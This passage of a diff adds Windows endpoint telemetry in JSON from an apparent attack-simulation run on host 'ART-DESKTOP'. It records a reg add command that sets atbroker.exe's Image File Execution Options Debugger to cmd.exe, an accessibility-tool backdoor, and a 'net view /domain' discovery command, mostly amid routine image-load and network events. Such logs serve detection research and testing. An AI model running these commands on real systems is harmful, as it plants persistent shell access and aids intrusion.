"parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2960, + "ppid": 7036, + 
"process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571829120000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2960, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2960, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2960, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2960, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2960, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" + }, + { + "event_type": "process", + "pid": 2960, + "process_name": "cmd.exe", + "process_path": 
"C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571829180000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\atbroker.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 556, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571829730000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", 
+ "pid": 556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829640000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\atbroker.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7292, + "ppid": 556, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571829830000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7292, + "process_name": "reg.exe", + 
"process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571829800000, + "unique_pid": 
"{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "registry", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe", + "registry_value": "atbroker.exe", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "registry", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "process", + "pid": 7292, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571829800000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" + }, + { + "event_type": "process", + "pid": 556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5244, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571830030000, + "unique_pid": 
"{42FC7E13-CB3F-5C05-0000-0010E04D5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5244, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5244, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5244, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5244, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5244, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" + }, + { + "event_type": "process", + "pid": 5244, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571829950016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" + }, + { + 
"command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"net view /domain\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5360, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571831130016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5360, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571831050000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5360, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571831050000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5360, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571831050000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5360, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571831050000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + 
"pid": 5360, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571831050000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" + }, + { + "command_line": "net view /domain", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5628, + "ppid": 5360, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "subtype": "create", + "timestamp": 131883571831220000, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}", + "unique_ppid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "net.exe", + "image_path": "C:\\Windows\\System32\\net.exe", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { 
+ "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\System32\\mpr.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 5628, + 
"process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "srvcli.dll", + "image_path": "C:\\Windows\\System32\\srvcli.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + 
"unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "browcli.dll", + "image_path": "C:\\Windows\\System32\\browcli.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "image_load", + "image_name": "cscapi.dll", + "image_path": "C:\\Windows\\System32\\cscapi.dll", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571831200016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "destination_address": "192.168.162.129", + "destination_port": "5353", + "event_type": "network", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "udp", + "source_address": "224.0.0.251", + "source_port": "5353", + "subtype": "incoming", + "timestamp": 131883571831380000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}", + "user": "NT AUTHORITY\\NETWORK SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "destination_address": "fe80:0:0:0:880a:c7ff:8cc2:f18b", + "destination_port": "5353", + "event_type": "network", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "udp", + "source_address": "ff02:0:0:0:0:0:0:fb", + "source_port": "5353", + "subtype": "incoming", + "timestamp": 131883571831390000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}", + "user": "NT AUTHORITY\\NETWORK SERVICE", + "user_domain": 
"NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "destination_address": "192.168.162.129", + "destination_port": "137", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.134", + "source_port": "137", + "subtype": "outgoing", + "timestamp": 131883571841500000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "fe80:0:0:0:880a:c7ff:8cc2:f18b", + "destination_port": "5355", + "event_type": "network", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "udp", + "source_address": "fe80:0:0:0:c155:c569:9151:7881", + "source_port": "56888", + "subtype": "incoming", + "timestamp": 131883571841509984, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}", + "user": "NT AUTHORITY\\NETWORK SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpInterfaceOptions", + "registry_value": "DhcpInterfaceOptions", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": 
"HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpIPAddress", + "registry_value": "DhcpIPAddress", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpSubnetMask", + "registry_value": "DhcpSubnetMask", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpServer", + "registry_value": "DhcpServer", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\Lease", + "registry_value": "Lease", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + 
"process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\LeaseObtainedTime", + "registry_value": "LeaseObtainedTime", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\T1", + "registry_value": "T1", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\T2", + "registry_value": "T2", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\LeaseTerminatesTime", + "registry_value": 
